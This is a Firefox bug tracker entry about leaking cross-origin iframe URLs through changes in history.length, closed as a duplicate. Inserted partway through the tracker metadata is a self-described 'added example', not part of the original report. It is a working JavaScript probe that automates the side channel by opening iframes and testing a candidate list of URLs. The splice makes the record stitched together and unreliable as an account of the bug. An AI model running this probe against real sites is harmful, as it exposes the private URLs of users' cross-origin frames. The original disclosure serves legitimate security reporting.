Closed Bug 1747809 Opened 3 years ago Closed 3 years ago

Leaking cross-origin iframe URLs using history.length

Categories: Core :: DOM: Navigation, defect

Tracking: RESOLVED DUPLICATE of bug 1315203

People: Reporter: sivaneshashok, Unassigned

Details: Keywords: reporter-external, Whiteboard: [reporter-external] [client-bounty-form] [verif?]

When an iframe is navigated to its current URL, the value of history.length does not increase. However, when it's replaced with any other URL, the value of history.length increases by 1.
This behavior could be used to find the exact URL of an iframe, even if it is cross-origin.

Tested on - Firefox Browser 95.0.2 (64-bit)

STEPS TO REPRODUCE:

  1. Host an HTML file with the following contents
    <html><body><iframe src="http://example.com/secret"></iframe></body></html>
  2. Open the browser's console and check history.length
  3. Run the following in the console: window.frames[0].location = "http://example.com/secret"
  4. Now, check history.length, and it should be the same as before.
  5. Run the following in the console: window.frames[0].location = "http://example.com/abc"
  6. Now history.length would have increased.

This behavior could be automated to find the exact URL of the cross-origin iframe.

ATTACK SCENARIO:
A cross-origin page could potentially exploit this to find out the exact URL of the cross-origin iframe, which could leak sensitive information.

Flags: sec-bounty?
Group: firefox-core-security → dom-core-security
Component: Security → DOM: Navigation
Product: Firefox → Core
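The following is an added example, not code from the bug report or from Firefox: it automates the history.length oracle the steps above describe. The probe loop is written against a small frame adapter so the same logic can drive a real <iframe> in a browser or, for an offline run, a constructed in-memory model that encodes only the behaviour reported for Firefox 95 (navigating a frame to its current URL replaces the entry and leaves history.length alone; any other URL pushes an entry). The model, the example URLs and the candidate list are assumptions made for the demo; the browser adapter relies only on the <iframe> element's load event firing for a cross-origin document, on assigning a cross-origin window's location being permitted, and on history.length reflecting a new entry once the navigation has committed.

```javascript
// Added example (not from the bug report): automating the history.length
// oracle. One fresh frame per candidate, because after a wrong guess the frame
// is parked on the guess rather than on the URL being probed, so re-using a
// single frame would make every later comparison meaningless.

// Returns the first candidate whose navigation did NOT grow history.length,
// or null if no candidate matched.
async function probeFrameUrl(openFrame, candidates) {
  for (const candidate of candidates) {
    const frame = await openFrame();
    const before = frame.historyLength();
    await frame.navigate(candidate);
    const after = frame.historyLength();
    frame.close();
    if (after === before) return candidate;   // replace, not push: URL matched
  }
  return null;
}

// Browser adapter (assumed usage of standard DOM APIs only). `initialSrc` is
// the URL the attacker embeds, e.g. a page that redirects to the URL being
// guessed. history.length is read only after each load event so that the new
// session-history entry, if any, has been committed.
function browserFrameOpener(initialSrc) {
  const loaded = (el) =>
    new Promise((done) => el.addEventListener('load', done, { once: true }));
  return async () => {
    const el = document.createElement('iframe');
    const firstLoad = loaded(el);
    el.src = initialSrc;
    document.body.appendChild(el);
    await firstLoad;
    return {
      historyLength: () => history.length,
      navigate: async (url) => {
        const next = loaded(el);
        el.contentWindow.location = url;      // same as frames[i].location = url
        await next;
      },
      close: () => el.remove(),
    };
  };
}

// Constructed in-memory model of the reported behaviour, so the probe can be
// exercised without a browser. `secretUrl` is where a fresh frame lands (after
// any redirect); `baseLength` stands in for the top-level page's own entries.
function simulatedFrameOpener(secretUrl, baseLength = 1) {
  return async () => {
    let current = secretUrl;
    let length = baseLength;
    return {
      historyLength: () => length,
      navigate: async (url) => {
        if (url !== current) {                 // reported behaviour: push
          length += 1;
          current = url;
        }                                      // same URL: replace, unchanged
      },
      close: () => {},
    };
  };
}

// Offline demo with a constructed candidate list. In a browser, swap in
// browserFrameOpener('http://example.com/start') and a real wordlist.
if (typeof document === 'undefined') {
  const candidates = [
    'http://example.com/abc',
    'http://example.com/secret',
    'http://example.com/xyz',
  ];
  probeFrameUrl(simulatedFrameOpener('http://example.com/secret'), candidates)
    .then((found) => console.log('frame URL:', found));
}
```

The adapter boundary is the point worth keeping: the oracle itself is just "did history.length move", and everything browser-specific (waiting for the cross-origin load, removing the frame so its entries do not accumulate) lives in the opener. With the in-memory model the first candidate pushes an entry, the second is a same-URL replace and is returned, and the third is never tried.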

Various history.length related issues are discussed in the spec issue https://github.com/whatwg/html/issues/2018
(and IIRC there are also other related HTML spec issues open)

Severity: -- → S3
Status: UNCONFIRMED → RESOLVED
Closed: 3 years ago
Resolution: --- → DUPLICATE
Group: dom-core-security
Flags: sec-bounty? → sec-bounty-